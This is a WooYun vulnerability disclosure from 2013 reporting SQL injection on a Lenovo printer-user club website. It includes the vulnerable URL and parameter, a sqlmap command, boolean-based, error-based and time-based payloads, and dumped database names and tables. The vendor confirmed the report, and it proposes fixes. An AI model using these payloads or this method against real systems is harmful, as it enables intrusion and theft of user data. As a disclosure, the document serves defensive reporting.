漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-046143
漏洞标题:联想4#某人气分站存在SQL注射漏洞(数万用户数据危急)
相关厂商:联想
漏洞作者: Mr.leo
提交时间:2013-12-19 17:06
修复时间:2014-02-02 17:06
公开时间:2014-02-02 17:06
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-23: 厂商已经确认,细节仅向厂商公开
2014-01-02: 细节向核心白帽子及相关领域专家公开
2014-01-12: 细节向普通白帽子公开
2014-01-22: 细节向实习白帽子公开
2014-02-02: 细节向公众公开
简要描述:
联想4#某人气分站存在SQL注射漏洞(46203用户数据泄露)
详细说明:
站点:
http://www.lenovoprinterclub.com/cases_detail.php?contentid=44
http://lenovoprinterclub.com 联想打印用户俱乐部
id参数没有过滤,导致注射漏洞
sqlmap.py -u "http://lenovoprinterclub.com/cases_detail.php?contentid=44" --dbs --current-user --current-db
Place: GET
Parameter: contentid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentid=44 AND 5503=5503
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: contentid=44 AND (SELECT 9152 FROM(SELECT COUNT(*),CONCAT(0x3a68646
d3a,(SELECT (CASE WHEN (9152=9152) THEN 1 ELSE 0 END)),0x3a6e63673a,FLOOR(RAND(0
)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: contentid=44 AND SLEEP(5)
---
[18:00:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.23, PHP 5.3.27
back-end DBMS: MySQL 5.0
[18:00:27] [INFO] fetching current user
[18:00:27] [INFO] resumed: pntcom@localhost
current user: 'pntcom@localhost'
[18:00:27] [INFO] fetching current database
[18:00:27] [INFO] resumed: lenovoprinterclub
current database: 'lenovoprinterclub'
[18:00:27] [INFO] fetching database names
[18:00:27] [INFO] the SQL query used returns 2 entries
[18:00:27] [INFO] resumed: information_schema
[18:00:27] [INFO] resumed: lenovoprinterclub
available databases [2]:
[*] information_schema
[*] lenovoprinterclub
Database: lenovoprinterclub
[136 tables]
+------------------------+
| ng_800 |
| ng_admin |
| ng_admin_role |
| ng_admin_role_priv |
| ng_ads |
| ng_ads_1008 |
| ng_ads_1009 |
| ng_ads_1303 |
| ng_ads_place |
| ng_ads_stat |
| ng_announce |
| ng_area |
| ng_ask |
| ng_ask_actor |
| ng_ask_credit |
| ng_ask_posts |
| ng_ask_vote |
| ng_attachment |
| ng_author |
| ng_block |
| ng_c_case |
| ng_c_down |
| ng_c_gift |
| ng_c_info |
| ng_c_ku6video |
| ng_c_news |
| ng_c_picture |
| ng_c_product |
| ng_c_video |
| ng_c_voucher |
| ng_cache_count |
| ng_category |
| ng_collect |
| ng_comment |
| ng_content |
| ng_content_count |
| ng_content_position |
| ng_content_tag |
| ng_copyfrom |
| ng_datasource |
| ng_digg |
| ng_digg_log |
| ng_editor_data |
| ng_error_report |
| ng_form_test1 |
| ng_formguide |
| ng_formguide_fields |
| ng_giftorder |
| ng_guestbook |
| ng_hits |
| ng_ipbanned |
| ng_keylink |
| ng_keyword |
| ng_link |
| ng_linkage |
| ng_log |
| ng_mail |
| ng_mail_email |
| ng_mail_email_type |
| ng_member |
| ng_member_cache |
| ng_member_company |
| ng_member_detail |
| ng_member_group |
| ng_member_group_extend |
| ng_member_group_priv |
| ng_member_info |
| ng_member_regprod |
| ng_member_voucher |
| ng_membertype |
| ng_menu |
| ng_message |
| ng_model |
| ng_model_field |
| ng_module |
| ng_mood |
| ng_mood_data |
| ng_order |
| ng_order_deliver |
| ng_order_log |
| ng_pay_card |
| ng_pay_exchange |
| ng_pay_payment |
| ng_pay_pointcard_type |
| ng_pay_stat |
| ng_pay_user_account |
| ng_player |
| ng_point_detail |
| ng_position |
| ng_process |
| ng_process_status |
| ng_regprod |
| ng_regprod_printhome |
| ng_role |
| ng_search |
| ng_search_type |
| ng_serialnumber |
| ng_session |
| ng_space |
| ng_space_api |
| ng_special |
| ng_special_content |
| ng_spider_job |
| ng_spider_sites |
| ng_spider_urls |
| ng_status |
| ng_times |
| ng_type |
| ng_urlrule |
| ng_video |
| ng_video_count |
| ng_video_data |
| ng_video_position |
| ng_video_special |
| ng_video_special_list |
| ng_video_tag |
| ng_vote_data |
| ng_vote_option |
| ng_vote_subject |
| ng_vote_useroption |
| ng_voucher |
| ng_workflow |
| ng_yp_apply |
| ng_yp_buy |
| ng_yp_cert |
| ng_yp_collect |
| ng_yp_count |
| ng_yp_guestbook |
| ng_yp_job |
| ng_yp_news |
| ng_yp_product |
| ng_yp_relation |
| ng_yp_stats |
| ng_yp_stock |
| test |
| test2010 |
+------------------------+
用户信息46203
部分数据,用户名密码为MD5加密,可被反查。
over
漏洞证明:
已经证明
修复方案:
1#过滤参数
2#用户密码加盐后再一次MD5
版权声明:转载请注明来源 Mr.leo@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-12-23 15:47
厂商回复:
感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞
最新状态:
暂无